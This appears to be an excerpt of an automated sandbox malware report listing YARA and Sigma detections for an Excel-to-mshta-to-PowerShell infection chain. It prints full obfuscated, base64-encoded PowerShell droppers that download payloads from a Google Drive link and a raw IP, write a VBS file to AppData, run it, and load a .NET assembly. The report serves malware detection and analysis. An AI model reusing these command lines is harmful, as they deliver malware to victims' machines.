          • 0x24ea5:$b2: ::FromBase64String(
          • 0x25533:$b2: ::FromBase64String(
          • 0x2ac0b:$b2: ::FromBase64String(
          • 0x33e45:$b2: ::FromBase64String(
          • 0x3a1ca:$b2: ::FromBase64String(
          • 0x3a9d9:$b2: ::FromBase64String(
          • 0x3b071:$b2: ::FromBase64String(
          • 0x3cd26:$b2: ::FromBase64String(
          • 0x3d381:$b2: ::FromBase64String(
          • 0x4440e:$b2: ::FromBase64String(
          • 0x45319:$b2: ::FromBase64String(
          • 0x53291:$b2: ::FromBase64String(
          • 0x71e2f:$b2: ::FromBase64String(
          • 0x724bc:$b2: ::FromBase64String(
          • 0x783c8:$b2: ::FromBase64String(
          • 0x78a56:$b2: ::FromBase64String(
          • 0x450e2:$b3: ::UTF8.GetString(
          • 0x53098:$b3: ::UTF8.GetString(
          • 0x12996:$s1: -join
          • 0x12b9d:$s1: -join
          Process Memory Space: powershell.exe PID: 1472JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: powershell.exe PID: 3860JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              Click to see the 1 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Base64 Encoded PowerShell Command Detected
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0
              Sigma detected: File With Uncommon Extension Created By An Office Application
              Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3360, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme[1].hta
              Sigma detected: Potential PowerShell Command Line Obfuscation
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/22
              Sigma detected: Potentially Suspicious PowerShell Child Processes
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3740, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS" , ProcessId: 4044, ProcessName: wscript.exe
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0
              Sigma detected: Suspicious MSHTA Child Process
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))", CommandLine: "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgI
              Sigma detected: Suspicious Microsoft Office Child Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3360, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3656, ProcessName: mshta.exe
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3740, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe, ProcessId: 3844, ProcessName: powershell.exe
              Sigma detected: WScript or CScript Dropper
